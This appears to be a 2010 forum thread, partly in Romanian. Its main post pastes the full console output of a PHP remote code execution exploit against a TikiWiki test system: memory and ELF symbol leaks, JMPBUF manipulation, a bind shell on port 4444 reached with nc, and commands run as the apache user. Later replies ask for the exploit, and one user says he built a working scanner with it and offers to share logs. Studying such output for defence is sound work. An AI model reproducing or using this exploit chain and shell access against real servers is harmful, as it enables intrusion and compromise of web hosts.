hozarares Posted October 7, 2010 Report Posted October 7, 2010 $ ./exploit.py -h http://t.testsystem/ PHP xxx() Remote Code Execution Exploit (TikiWiki Version)Copyright © 2010 Stefan Esser/SektionEins GmbH *** DO NOT DISTRIBUTE ***[+] Connecting to determine wordsize[+] Wordsize is 32 bit[+] Connecting to determine PHP 5.2.x vs. PHP 5.3.x[+] PHP version is 5.3.x[+] Connecting to determine XXX version[+] PHP version >= 5.3.2[+] Determining endianess of system[+] System is little endian[+] Leaking address of std_object_handlers[+] Found std_object_handlers address to be 0xb76e84a0[+] Leaking std_object_handlers[+] Retrieved std_object_handlers (0xb75b5c60, 0xb75b6230, 0xb75b2300, 0xb75b4c70, 0xb75b52f0, 0xb75b3fc0, 0xb75b42b0, 0xb75b4430, 0x00000000, 0x00000000, 0xb75b3c60, 0xb75b4a40, 0xb75b57a0, 0xb75b4170, 0xb75b27d0, 0xb75b4f00, 0x00000000, 0xb75b28a0, 0xb75b27a0, 0xb75b2af0, 0xb75b2830, 0xb75b46b0, 0x00000000, 0x00000000, 0xb75b2be0)[+] Optimized to 0xb74008f0[+] Scanning for executable header[+] ELF header found at 0xb73ab000[+] Retrieving and parsing ELF header[+] Retrieving program headers[+] Retrieving ELF string table[+] Looking up ELF symbol: executor_globals[+] Found executor_globals at 0xb76fe280[+] Looking up ELF symbol: php_execute_script[+] Found php_execute_script at 0xb75386c0[+] Looking up ELF symbol: zend_eval_string[+] Found zend_eval_string at 0xb7586580[+] Searching JMPBUF in executor_globals[+] Found JMPBUF at 0xbfcc64b4[+] Attempt to crack JMPBUF[+] Determined stored EIP value 0xb753875a from pattern match[+] Calculated XORER 0x68ab06ea[+] Unmangled stored ESP is 0xbfcc5470[+] Checking memory infront of JMPBUF for overwriting possibilities[+] Found 0x28 at 0xbfcc6498 (0x3e4) using it as overwrite trampoline[+] Returning into PHP... Spawning a shell at port 4444...$ nc t.testsystem 4444Welcome to the PHPShell 5/22/2010 1:27 amsystem("uname -a");Linux fedora13x86 2.6.33.4-95.fc13.i686.PAE #1 SMP Thu May 13 05:38:26 UTC 2010 i686 i686 i386 GNU/Linuxsystem("id");uid=48(apache) gid=484(apache) groups=484(apache) context=unconfined_u:system_r:httpd_t:s0... Quote
adi003user Posted October 8, 2010 Report Posted October 8, 2010 explained: Nibbles microblog Pwning PHP for fun and chocapicz Quote
michee Posted December 13, 2010 Report Posted December 13, 2010 asa de curiozitate, are careva acest exploit? Quote
napoletanii Posted December 19, 2010 Report Posted December 19, 2010 eu am facut un mic scanner cu el ... si merge bine ... chiar surprinzator .. daca vreti logorui va dau .. Quote
